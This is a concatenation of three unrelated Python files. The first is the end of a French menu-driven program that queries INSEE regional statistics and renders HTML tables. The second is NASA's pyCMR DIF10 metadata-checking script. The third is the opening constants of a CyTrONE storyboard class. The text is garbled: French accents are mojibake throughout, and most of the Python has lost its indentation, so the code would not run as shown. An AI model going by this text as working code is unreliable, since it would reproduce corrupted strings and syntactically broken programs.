('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "RΓ©gion" else '' for i in x])
.set_properties(subset=["Valorisation en 2013"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 8",\
"Région où se trouve le département ayant le plus faible taux de valorisation matière et organique en 2013",\
"question_08.html", html)
if (bconsole):
print("La région où se trouve le département ayant le plus faible taux de valorisation matière et organique en 2013 est :")
print("Reg, RΓ©gion, DΓ©partement, Valorisation2013")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 9
def bestPopMin():
cur.execute("""SELECT departementenvironnement.departements, departementenvironnement.agriculturebio2016
FROM departementenvironnement
INNER JOIN departementsocial
ON departementenvironnement.departements = departementsocial.departements
ORDER BY nullif(popeloignee7min, 'NaN') DESC nulls last LIMIT 1""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['DΓ©partement', "Part de l'agriculture biologique"])
    # Format the values
df["Part de l'agriculture biologique"] = df["Part de l'agriculture biologique"].map("{:.1f}%".format)
titre_html = "Part en 2016 (en %) de lβagriculture biologique dans la surface agricole totale du dΓ©partement<br>" +\
"contenant le plus grand pourcentage de population Γ©loignΓ©e de plus de 7 minutes des services de santΓ© de proximitΓ©"
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "Part de l'agriculture biologique" else '' for i in x])
.set_properties(subset=["Part de l'agriculture biologique"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 9", titre_html, "question_09.html", html)
if (bconsole):
print("En 2016, la part (en %) de lβagriculture biologique dans la surface agricole totale du dΓ©partement")
print("contenant le plus grand pourcentage de population Γ©loignΓ©e de plus de 7 minutes des services de santΓ© de proximitΓ© est : ")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 10
def pauvrete():
cur.execute("""SELECT pauvrete,region
FROM regionsocial
WHERE jeunesnoninseres2014 > 30
AND pauvrete <> 'NaN'
ORDER BY nullif(pauvrete, 'NaN') DESC nulls last""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['PauvretΓ©', 'RΓ©gion'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "PauvretΓ©" else '' for i in x])
.format({"PauvretΓ©": "{:.2f}%"})
.set_properties(subset=["PauvretΓ©"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 10",\
"Taux de pauvretΓ© connu en 2014 des rΓ©gions dont la part des jeunes non insΓ©rΓ©s est supΓ©rieure Γ 30% en 2014",\
"question_10.html", html)
if (bconsole):
df["PauvretΓ©"] = df["PauvretΓ©"].map("{:.2f}%".format)
print("Le taux de pauvretΓ© connu en 2014 des rΓ©gions dont la part des jeunes non insΓ©rΓ©s est supΓ©rieure Γ 30% en 2014 sont : ")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 11
def poids_eco():
cur.execute("""SELECT regions.reg, regions.libelle, poidseco,
AVG(photovoltaique2015) AS photovoltaique2015,
AVG(agriculturebio2016) AS agriculturebio2016
FROM departements
INNER JOIN departementenvironnement
ON departements.dep = departementenvironnement.nb
INNER JOIN regionsocial
ON departements.reg = regionsocial.nb
INNER JOIN regions
ON departements.reg = regions.reg
GROUP BY poidseco, regions.reg
HAVING AVG(photovoltaique2015) >= 10
AND AVG(photovoltaique2015) <> 'NaN'
AND AVG(agriculturebio2016) >= 5
AND AVG(agriculturebio2016) <> 'NaN'
ORDER BY poidseco""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code rΓ©gion', 'RΓ©gion', "Poids de l'Γ©conomie sociale",\
"Part moyenne du photovoltaΓ―que", "Part moyenne de l'agriculture Bio"])
    # Convert strings to floats for formatting
df["Part moyenne du photovoltaΓ―que"] = pd.to_numeric(df["Part moyenne du photovoltaΓ―que"], errors='coerce').fillna(0)
df["Part moyenne de l'agriculture Bio"] = pd.to_numeric(df["Part moyenne de l'agriculture Bio"], errors="coerce").fillna(0)
titre_html = "Poids de l'Γ©conomie sociale en 2015 dans les emplois salariΓ©s de la rΓ©gion<br>" +\
"dont la source de la puissance Γ©lectrique en Γ©nergies renouvelables provenait Γ au moins 10% de l'Γ©nergie photovoltaΓ―que<br>" +\
"et dont la part de l'agriculture biologique dans la surface agricole totale Γ©tait d'au moins 5%"
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.set_properties(subset=["Poids de l'Γ©conomie sociale", "Part moyenne du photovoltaΓ―que",
"Part moyenne de l'agriculture Bio"], **{'text-align': 'right'})
.hide_index()
.background_gradient(cmap='Blues', subset=["Poids de l'Γ©conomie sociale"])
.format({"Poids de l'Γ©conomie sociale": "{:.1f}%"})
.format({"Part moyenne du photovoltaΓ―que": "{:.1f}%"})
.format({"Part moyenne de l'agriculture Bio": "{:.1f}%"})
.render())
affiche_html("Question 11", titre_html, "question_11.html", html)
if (bconsole):
df["Poids de l'Γ©conomie sociale"] = df["Poids de l'Γ©conomie sociale"].map("{:.1f}%".format)
df["Part moyenne du photovoltaΓ―que"] = df["Part moyenne du photovoltaΓ―que"].map("{:.1f}%".format)
df["Part moyenne de l'agriculture Bio"] = df["Part moyenne de l'agriculture Bio"].map("{:.1f}%".format)
print("Poids de l'Γ©conomie sociale en 2015 dans les emplois salariΓ©s de la rΓ©gion")
print("dont la source de la puissance Γ©lectrique en Γ©nergies renouvelables provenait Γ au moins 10% de l'Γ©nergie photovoltaΓ―que")
print("et dont la part de l'agriculture biologique dans la surface agricole totale Γ©tait d'au moins 5%")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
def menu():
print ("")
print ("------------------------------------ Projet INSEE -----------------------------------")
print ("")
print ("1...Afficher la liste des rΓ©gions")
print ("2...Afficher la liste des dΓ©partements")
print ("3...Demander Γ lβutilisateur de choisir une rΓ©gion et afficher les donnΓ©es de la region choisie")
print ("4...Demander Γ lβutilisateur de choisir un dΓ©partement et un thΓ¨me : social ou environnemental,")
print (" | et afficher les donnΓ©es demandΓ©es pour le departement choisi")
print ("5...demander Γ lβutilisateur de choisir un type dβΓ©nergie (Γ©olien, photovoltaΓ―que, autre)")
print (" | et en fonction de ce choix retourner la liste des dΓ©partements oΓΉ la part de cette Γ©nergie a augmentΓ©")
print (" | entre les deux annΓ©es de rΓ©fΓ©rence, classΓ©s de la plus forte augmentation Γ la plus faible.")
print ("6...les dΓ©partements dont la rΓ©gion a eu une production de granulats supΓ©rieure Γ 25 000 000 tonnes en 2014")
print ("7...les 5 dΓ©partements avec le plus grand taux dβΓ©nergie Γ©olienne comme source de la puissance Γ©lectrique en 2015")
print ("8...La région où se trouve le département ayant le plus faible taux de valorisation matière et organique en 2013")
print ("9...La part (en %) de lβagriculture biologique dans la surface agricole totale du dΓ©partement contenant")
print (" | le plus grand pourcentage de population Γ©loignΓ©e de plus de 7 minutes des services de santΓ© de proximitΓ© en 2016")
print ("10..Le taux de pauvretΓ© en 2014 des rΓ©gions dont la part des jeunes non insΓ©rΓ©s est supΓ©rieure Γ 30% en 2014 ")
print ("11..Le poids de l'Γ©conomie sociale dans les emplois salariΓ©s de la rΓ©gion dont la source de la puissance Γ©lectrique")
print (" | en Γ©nergies renouvelables provenait Γ au moins 10% de lβΓ©nergie photovoltaΓ―que et dont la part")
print (" | de lβagriculture biologique dans la surface agricole totale Γ©tait dβau moins 5% en 2015")
print ("")
print ("0...Quitter")
print ("-------------------------------------------------------------------------------------")
#----------------------------------------- MAIN --------------------------------------------------
# Ask whether to also display the results in the console; HTML files only by default
print("Souhaitez-vous afficher les rΓ©sultats dans la console,")
print("en plus de la crΓ©ation des fichiers HTML ?")
print(" (O Oui / N Non)")
choix = input()
if choix.strip().lower().startswith("o"):
    bconsole = True
# Main menu
while True:
menu()
print("Chosissez un numΓ©ro de question pour avoir la rΓ©ponse :")
choix = input()
if (choix == "1"):
listeRegions()
elif (choix == "2"):
listeDepartement()
elif (choix == "3"):
choixRegions()
elif (choix == "4"):
choix_departement_theme()
elif (choix == "5"):
typeEnergie()
elif (choix == "6"):
tonnes()
elif (choix == "7"):
topFive()
elif (choix == "8"):
weak()
elif (choix == "9"):
bestPopMin()
elif (choix == "10"):
pauvrete()
elif (choix == "11"):
poids_eco()
elif (choix == "0"):
break
else:
print ("Choix invalide")
# Close the cursor and the connection cleanly
cur.close()
connection.close()
|
'''
Copyright 2016, United States Government, as represented by the Administrator of
the National Aeronautics and Space Administration. All rights reserved.
The "pyCMR" platform is licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License. You may obtain a
copy of the License at http://www.apache.org/licenses/LICENSE-2.0.
Unless required by applicable law or agreed to in writing, software distributed under
the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
ANY KIND, either express or implied. See the License for the specific language
governing permissions and limitations under the License.
'''
#import sys
import os, errno
import json
import CollectionCheckerDIF
#import GranuleChecker
from cmr import searchCollection
#from cmr import searchGranule
from xml.etree import ElementTree
from xmlParser import XmlDictConfigDIF
from xmlParser import XmlDictConfig
collection_output_header = 'DIF10 Collection Elements,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,\n\
"* = GCMD controlled: http://gcmd.nasa.gov/learn/keyword_list.html\nThese datasets were reviewed in comparison to GCMD Keyword Version: 8.4.1",\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,\n\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,Platform\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,Spatial_Coverage\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,Organization\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,\n\
,,,,,,,,,,,,,,,,,,,,,,Personnel\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,Platform/ Instrument\
,,,,,,,,,,,,,,Platform/ Instrument/ Sensor\
,,,,,,,,,,,,"Temporal_Coverage (Must include a choice of 1, 2, 3 or 4)"\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Spatial_Coverage/ Geometry (must have a choice of (1), (2), (3) or (4))"\
,,,,,,,,,,,Spatial_Coverage/ Spatial_Info\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,Organization/ Personnel\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,\n\
,,,,,Dataset_Citation,,,,,,,,,,,,,,,Personnel/ Contact_Person,,,,,,,,,,,Personnel/ Contact_Group,,,,,,,,,Science_Keywords,,,,,,,,,,,,Platform/ Characteristics,,,,,,,,,Platform/ Instrument/ Characteristics,,,,,,,,\
Platform/ Instrument/ Sensor/ Characteristics,,,,,,,,,,,Temporal_Coverage/ Range_DateTime (1),,,Temporal_Coverage/ Periodic_DateTime (3),,,,,,,Temporal_Coverage/ Paleo_DateTime (4),,,,,,,,,,,,,,Spatial_Coverage/ Geometry/ Bounding_Rectangle (1),,,,,,,,,,Spatial_Coverage/ Geometry/ Point (2),,Spatial_Coverage/ Geometry/ Line (3),,,,Spatial_Coverage/ Geometry/ Polygon (4),,,,Spatial_Coverage/ Orbit_Parameters,,,,,Spatial_Coverage/ Vertical_Spatial_Info,,,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geodetic_Model,,,,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geographic_Coordinate_System,,,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Local_Coordinate_System,,Spatial_Coverage/ Spatial_Info/ TwoD_Coordinate_System,,,,,Location,,,,,,Data_Resolution,,,,,,,Project,,,,,,,,,,,,,,,,,,Organization/ Personnel/ Contact_Person ,,,,,,,,,,,Organization/ Personnel/ Contact_Group,,,,,,,,,Distribution ,,,,Multimedia_Sample,,,,,Reference,,,,,,,,,,,,,,,,,Summary ,,Related_URL ,,,,,,,Metadata_Association,,,,Additional_Attributes,,,,,,,,,,,,,,,,,Metadata_Dates,,,,,,,,,Extended_Metadata,,,,,,,,,,,,,,,\n\
Dataset Id (short name) - umm-json link,Entry_ID/ Short_Name,Entry_ID/ Version,Version_Description,Entry_Title,Dataset_Citation/ Dataset_Creator,Dataset_Citation/ Dataset_Editor,Dataset_Citation/ Dataset_Title,Dataset_Citation/ Dataset_Series_Name,Dataset_Citation/ Dataset_Release_Date,Dataset_Citation/ Dataset_Release_Place,Dataset_Citation/ Dataset_Publisher,Dataset_Citation/ Version,Dataset_Citation/ Issue_Identification,Dataset_Citation/ Data_Presentation_Form,Dataset_Citation/ Other_Citation_Details,* where type must = \"DOI\" Dataset_Citation/ Persistent_Identifier/ Type,* DOI should be entered here Dataset_Citation/ Persistent_Identifier/ Identifier,Dataset_Citation/ Online_Resource,Personnel/ Role ,Personnel/ Contact_Person/ First_Name,Personnel/ Contact_Person/ Middle_Name,Personnel/ Contact_Person/ Last_Name,Personnel/ Contact_Person/ Address/ Street_Address,Personnel/ Contact_Person/ Address/ City,Personnel/ Contact_Person/ Address/ State_Province,Personnel/ Contact_Person/ Address/ Postal_Code,Personnel/ Contact_Person/ Address/ Country,Personnel/ Contact_Person/ Email,Personnel/ Contact_Person/ Phone/ Number,Personnel/ Contact_Person/ Phone/ Type ,Personnel/ Contact_Group/ Name,Personnel/ Contact_Group/ Address/ Street_Address,Personnel/ Contact_Group/ Address/ City,Personnel/ Contact_Group/ Address/ State_Province,Personnel/ Contact_Group/ Address/ Postal_Code,Personnel/ Contact_Group/ Address/ Country,Personnel/ Contact_Group/ Email,Personnel/ Contact_Group/ Phone/ Number,Personnel/ Contact_Group/ Phone/ Type,Science_Keywords/ Category *,Science_Keywords/ Topic *,Science_Keywords/ Term *,Science_Keywords/ Variable_Level_1 *,Science_Keywords/ Variable_Level_1/ Variable_Level_2 *,Science_Keywords/ Variable_Level_1/ Variable_Level_2/ Variable_Level_3 *,Science_Keywords/ Variable_Level_1/ Variable_Level_2/ Variable_Level_3/ Detailed_Variable,ISO_Topic_Category,Ancillary_Keyword,Platform/ Type *,Platform/ Short_Name *,Platform/ Long_Name*,Platform/ Characteristics/ Name ,Platform/ Characteristics/ Description,Platform/ Characteristics/ DataType,Platform/ Characteristics/ Unit,Platform/ Characteristics/ Value,Platform/ Instrument/ Short_Name *,Platform/ Instrument/ Long_Name *,Platform/ Instrument/ Technique,Platform/ Instrument/ NumberOfSensors,Platform/ Instrument/ Characteristics/ Name,Platform/ Instrument/ Characteristics/ Description,Platform/ Instrument/ Characteristics/ DataType,Platform/ Instrument/ Characteristics/ Unit ,Platform/ Instrument/ Characteristics/ Value,Platform/ Instrument/ OperationalMode,Platform/ Instrument/ Sensor/ Short_Name *,Platform/ Instrument/ Sensor/ Long_Name *,Platform/ Instrument/ Sensor/ Technique,Platform/ Instrument/ Sensor/ Characteristics/ Name ,Platform/ Instrument/ Sensor/ Characteristics/ Description ,Platform/ Instrument/ Sensor/ Characteristics/ DataType ,Platform/ Instrument/ Sensor/ Characteristics/ Unit ,Platform/ Instrument/ Sensor/ Characteristics/ Value ,Temporal_Coverage/ Time_Type,Temporal_Coverage/ Date_Type,Temporal_Coverage/ Temporal_Range_Type,Temporal_Coverage/ Precision_Of_Seconds,Temporal_Coverage/ Ends_At_Present_Flag,Temporal_Coverage/ Range_DateTime/ Beginning_Date_Time ,Temporal_Coverage/ Range_DateTime/ Ending_Date_Time ,Temporal_Coverage/ Single_Date_Time (2),Temporal_Coverage/ Periodic_DateTime/ Name,Temporal_Coverage/ Periodic_DateTime/ Start_Date,Temporal_Coverage/ Periodic_DateTime/ End_Date,Temporal_Coverage/ Periodic_DateTime/ Duration_Unit,Temporal_Coverage/ Periodic_DateTime/ 
Duration_Value,Temporal_Coverage/ Periodic_DateTime/ Period_Cycle_Duration_Unit,Temporal_Coverage/ Periodic_DateTime/ Period_Cycle_Duration_Value,Temporal_Coverage/ Paleo_DateTime/ Paleo_Start_Date,Temporal_Coverage/ Paleo_DateTime/ Paleo_Stop_Date,Temporal_Coverage/ Paleo_DateTime/ Chronostratigraphic_Unit/ Eon,Temporal_Coverage/ Paleo_DateTime/ Chronostratigraphic_Unit/ Era,Temporal_Coverage/ Paleo_DateTime/ Chronostratigraphic_Unit/ Period,Temporal_Coverage/ Paleo_DateTime/ Chronostratigraphic_Unit/ Epoch,Temporal_Coverage/ Paleo_DateTime/ Chronostratigraphic_Unit/ Stage,Temporal_Coverage/ Paleo_DateTime/ Chronostratigraphic_Unit/ Detailed_Classification ,Temporal_Coverage/ Temporal_Info/ Ancillary_Temporal_Keyword ,DataSet_Progress,Spatial_Coverage/ Spatial_Coverage_Type,Spatial_Coverage/ Granule_Spatial_Representation,Spatial_Coverage/ Zone_Identifier,Spatial_Coverage/ Geometry/ Coordinate_System ,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Southernmost_Latitude,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Northernmost_Latitude,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Westernmost_Longitude,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Easternmost_Longitude,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Minimum_Altitude,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Maximum_Altitude,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Altitude_Unit,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Minimum_Depth,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Maximum_Depth,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Depth_Unit,Spatial_Coverage/ Geometry/ Point/ Point_Longitude,Spatial_Coverage/ Geometry/ Point/ Point_Latitude,Spatial_Coverage/ Geometry/ Line/ Point/ Point_Longitude,Spatial_Coverage/ Geometry/ Line/ Point/ Point_Latitude,Spatial_Coverage/ Geometry/ Line/ Center_Point/ Point_Latitude,Spatial_Coverage/ Geometry/ Line/ Center_Point/ Point_Latitude,Spatial_Coverage/ Geometry/ Polygon/ Boundary/ Point/ Point_Longitude,Spatial_Coverage/ Geometry/ Polygon/ Boundary/ Point/ Point_Latitude,Spatial_Coverage/ Geometry/ Polygon/ Exclusion_Zone/ Boundary/ Point/ Point_Longitude,Spatial_Coverage/ Geometry/ Polygon/ Exclusion_Zone/ Boundary/ Point/ Point_Latitude,Spatial_Coverage/ Orbit_Parameters/ Swath_Width,Spatial_Coverage/ Orbit_Parameters/ Period,Spatial_Coverage/ Orbit_Parameters/ Inclination_Angle,Spatial_Coverage/ Orbit_Parameters/ Number_of_Orbits,Spatial_Coverage/ Orbit_Parameters/ Start_Circular_Latitude,Spatial_Coverage/ Vertical_Spatial_Info/ Type,Spatial_Coverage/ Vertical_Spatial_Info/ Value,Spatial_Coverage/ Spatial_Info/ Spatial_Coverage_Type,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geodetic_Model/ Horizontal_DatumName,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geodetic_Model/ Ellipsoid_Name,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geodetic_Model/ Semi_Major_Axis,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geodetic_Model/ Denominator_Of_Flattening_Ratio,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geographic_Coordinate_System/ GeographicCoordinateUnits,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geographic_Coordinate_System/ LatitudeResolution,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geographic_Coordinate_System/ LongitudeResolution,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Local_Coordinate_System/ Description,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Local_Coordinate_System/ 
GeoReferenceInformation,Spatial_Coverage/ Spatial_Info/ TwoD_Coordinate_System/ TwoD_Coordinate_System_Name,Spatial_Coverage/ Spatial_Info/ TwoD_Coordinate_System/ Coordinate1/ Minimum_Value ,Spatial_Coverage/ Spatial_Info/ TwoD_Coordinate_System/ Coordinate1/ Maximum_Value,Spatial_Coverage/ Spatial_Info/ TwoD_Coordinate_System/ Coordinate2/ Minimum_Value,Spatial_Coverage/ Spatial_Info/ TwoD_Coordinate_System/ Coordinate2/ Maximum_Value,Location/ Location_Category *,Location/ Location_Type *,Location/ Location_Subregion1 *,Location/ Location_Subregion2 *,Location/ Location_Subregion3 *,Location/ Detailed_Location,Data_Resolution/ Latitude_Resolution,Data_Resolution/ Longitude_Resolution,Data_Resolution/ Horizontal_Resolution_Range,Data_Resolution/ Vertical_Resolution,Data_Resolution/ Vertical_Resolution_Range,Data_Resolution/ Temporal_Resolution,Data_Resolution/ Temporal_Resolution_Range,Project/ Short_Name *,Project/ Long_Name *,Project/ Campaign,Project/ Start_Date,Project/ End_Date,Quality,Access_Constraints,Use_Constraints,DataSet_Language,Originating_Center,Organization/ Organization_Type,Organization/ Organization_Name/ Short_Name *,Organization/ Organization_Name/ Long_Name *,Organization/ Hours_Of_Service,Organization/Instructions,Organization/Organization_URL,Organization/Data_Set_ID,Organization/ Personnel/ Role ,Organization/ Personnel/ Contact_Person/ First_Name,Organization/ Personnel/ Contact_Person/ Middle_Name,Organization/ Personnel/ Contact_Person/ Last_Name,Organization/ Personnel/ Contact_Person/ Address/ Street_Address,Organization/ Personnel/ Contact_Person/ Address/ City,Organization/ Personnel/ Contact_Person/ Address/ State_Province,Organization/ Personnel/ Contact_Person/ Address/ Postal_Code,Organization/ Personnel/ Contact_Person/ Address/ Country,Organization/ Personnel/ Contact_Person/ Email,Organization/ Personnel/ Contact_Person/ Phone/ Number,Organization/ Personnel/ Contact_Person/ Phone/ Type ,Organization/ Personnel/ Contact_Group/ Name,Organization/ Personnel/ Contact_Group/ Address/ Street_Address,Organization/ Personnel/ Contact_Group/ Address/ City,Organization/ Personnel/ Contact_Group/ Address/ State_Province,Organization/ Personnel/ Contact_Group/ Address/ Postal_Code,Organization/ Personnel/ Contact_Group/ Address/ Country,Organization/ Personnel/ Contact_Group/ Email,Organization/ Personnel/ Contact_Group/ Phone/ Number,Organization/ Personnel/ Contact_Group/ Phone/ Type,Distribution/ Distribution_Media,Distribution/ Distribution_Size,Distribution/ Distribution_Format,Distribution/ Fees,Multimedia_Sample/ File,Multimedia_Sample/ URL,Multimedia_Sample/Format,Multimedia_Sample/Caption,Multimedia_Sample/Description,Reference/ Citation,Reference/ Author,Reference/ Publication Date,Reference/ Title,Reference/ Series,Reference/ Edition,Reference/ Volume,Reference/ Issue,Reference/\
Report_Number,Reference/Publication_Place,Reference/ Publisher,Reference/ Pages,Reference/ ISBN,Reference/Persistent_Identifier/ Type,Reference/Persistent_Identifier/ Identifier,Reference/Online_Resource,Reference/Other_Reference_Details,Summary/ Abstract,Summary/ Purpose,Related_URL/ URL_Content_Type/ Type *,Related_URL/ URL_Content_Type/ Subtype *,Related_URL/ Protocol,Related_URL/ URL,Related_URL/ Title,Related_URL/ Description,Related_URL/ Mime_Type,Metadata_Association/ Entry_Id,Metadata_Association/ Type,Metadata_Association/ Description,IDN_Node/ Short_Name,Additional_Attributes/ Name,Additional_Attributes/ DataType,Additional_Attributes/ Description,Additional_Attributes/ MeasurementResolution,Additional_Attributes/ ParameterRangeBegin,Additional_Attributes/ ParameterRangeEnd,Additional_Attributes/ ParameterUnitsOfMeasure,Additional_Attributes/ ParameterValueAccuracy,Additional_Attributes/ ValueAccuracyExplanation,Additional_Attributes/ Value,Product_Level_ID,Product_Flag,Collection_Data_Type,Originating_Metadata_Node,Metadata_Name,Metadata_Version,DIF_Revision_History,Metadata_Dates/ Metadata_Creation,Metadata_Dates/ Metadata_Last_Revision,Metadata_Dates/ Metadata_Future_Review,Metadata_Dates/ Metadata_Delete,Metadata_Dates/ Data_Creation,Metadata_Dates/ Data_Last_Revision,Metadata_Dates/ Data_Future_Review,Metadata_Dates/ Data_Delete,Private,Extended_Metadata/ Metadata/ Group,Extended_Metadata/ Metadata/ Name,Extended_Metadata/ Metadata/ Description,Extended_Metadata/ Metadata/ Type,Extended_Metadata/ Metadata/ Update_Date,Extended_Metadata/ Value,Checked by:,Comments:,# Red fields (absolute errors):,# Yellow fields (recommended fixes),# Green fields (observations/ may or may not need to be fixed),# np fields (not in the metadata, and not marked by any color),# fields checked (265 - #np fields),% red fields,% yellow fields,% green fields\n'
def silentremove(filename):
try:
os.remove(filename)
except OSError as e: # this would be "except OSError, e:" before Python 2.6
if e.errno != errno.ENOENT: # errno.ENOENT = no such file or directory
            raise  # re-raise the exception if a different error occurred
def replace_file(filename):
f = open(filename)
lines = f.readlines()
f.close()
length = len(lines)
for i in range(length):
        # Normalize the root tag (e.g. strip schema attributes from "<DIF ...>")
        # so that ElementTree can iterate over plain 'DIF' elements below.
        if lines[i][0:4] == "<DIF":
            lines[i] = '<DIF>\n'
f = open(filename, 'w')
for l in lines:
f.write(l)
f.close()
def doCollectionCheckwithRecordsDIF(filename, outputform = 'CSV', outfilename = "result.csv"):
replace_file(filename)
xml = ElementTree.parse(filename)
root_element = xml.getroot()
ck = CollectionCheckerDIF.Checker()
if (outputform == 'JSON'):
for collection in root_element.iter('DIF'):
metadata = XmlDictConfigDIF(collection)
return ck.checkAllJSON(metadata)
else:
out_fp = open(outfilename, 'w')
out_fp.write(collection_output_header)
for collection in root_element.iter('DIF'):
metadata = XmlDictConfigDIF(collection)
result = ck.checkAll(metadata)
out_fp.write(filename+ ", " +result + "\n")
out_fp.close()
def doCollectionCheckwithShortNameListDIF(filename, outfilename = "result.csv", tmp_path = "./"):
in_fp = open(filename, 'r')
out_fp = open(outfilename, 'w')
out_fp.write(collection_output_header)
ck = CollectionCheckerDIF.Checker()
for line in iter(in_fp.readline, b''):
shortName = line.rstrip()
if len(shortName) != 0:
#print shortName
result = searchCollection(limit=100, short_name=shortName)
            result[0].download(tmp_path)
fileNameTemp = tmp_path+shortName.replace('/', '')
replace_file(fileNameTemp)
xml = ElementTree.parse(fileNameTemp)
root_element = xml.getroot()
for collection in root_element.iter('DIF'):
metadata = XmlDictConfigDIF(collection)
result = ck.checkAll(metadata)
out_fp.write(shortName+ ", " + result + '\n')
silentremove(tmp_path+shortName.replace('/', ''))
in_fp.close()
out_fp.close()
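# Illustrative invocations (the file names below are hypothetical):
# doCollectionCheckwithRecordsDIF('collections_dif.xml', outputform='CSV', outfilename='dif_check.csv')
# doCollectionCheckwithShortNameListDIF('short_name_list.txt', outfilename='dif_check.csv', tmp_path='./tmp/')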
|
#############################################################################
# Classes related to the CyTrONE storyboard
#############################################################################
class Storyboard:
# Global configuration flags
ENABLE_HTTPS = True
ENABLE_PASSWORD = True
# Separator constants
SEPARATOR1 = "-------------------------------------------------------------------------"
SEPARATOR2 = "========================================================================="
SEPARATOR3 = "#########################################################################"
# Server status keys
SERVER_STATUS_KEY = "status"
SERVER_STATUS_SUCCESS = "SUCCESS"
SERVER_STATUS_ERROR = "ERROR"
SERVER_ACTIVITY_ID_KEY = "activity_id"
SERVER_MESSAGE_KEY = "message"
# Server status messages
USER_SETTINGS_LOADING_ERROR = "Server could not load the user information database"
USER_ID_MISSING_ERROR = "User id is missing"
USER_ID_INVALID_ERROR = "User id is invalid"
